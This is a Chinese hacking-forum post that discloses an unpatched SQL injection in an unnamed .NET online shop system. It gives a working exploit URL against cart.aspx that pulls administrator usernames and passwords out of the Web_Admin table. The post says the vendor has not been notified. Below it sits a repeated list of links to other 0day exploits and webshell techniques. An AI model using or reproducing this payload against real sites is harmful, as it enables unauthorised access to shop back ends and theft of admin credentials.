因为是.net 程序,
此漏洞可威胁服务器安全,
暂且发布暴管理帐号信息,
影响版本:只测试最新的,旧版本也测试了几个,都OK。
程序介绍:.net 的在线商城系统
以下是测试EXP:
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 –
暂未通知官方修补。
转载请注名本站原创!!
本篇文章来源于 Any_size|反入侵小组 原文链接:http://www.17hack.com/news/sort02/News-1219.html
只显示10条记录相关文章
ecshop最新版(v272) 本地包含漏洞ODAY(鸡肋) (浏览: 16094, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12075, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16026, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11760, 评论: 0)
良精所有产品通杀 (浏览: 8914, 评论: 0)
shopwind oday 分析 (浏览: 9080, 评论: 0)
云起企业建站系统通杀oday (浏览: 11188, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12197, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)
又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行) (浏览: 8335, 评论: 0)
无忧购物时尚ASP版 oday (浏览: 12075, 评论: 0)
ECSHOP 2.7.X注入漏洞_20100507 (浏览: 16026, 评论: 0)
最新DVBBS8.0以上版本后台提升webshell 0day (浏览: 11760, 评论: 0)
良精所有产品通杀 (浏览: 8914, 评论: 0)
shopwind oday 分析 (浏览: 9080, 评论: 0)
云起企业建站系统通杀oday (浏览: 11188, 评论: 0)
Discuz! 6.x/7.x SODB-2008-13 Exp (浏览: 12197, 评论: 0)
传说中的IE最新0DAY(IE的ActiveX远程执行代码2(不安全的方法)) (浏览: 7460, 评论: 0)
又一个IE的最新0DAY(IE浏览器wshom.ocx ActiveX控件远程代码执行) (浏览: 8335, 评论: 0)
Trackbacks
 |
 |
 |
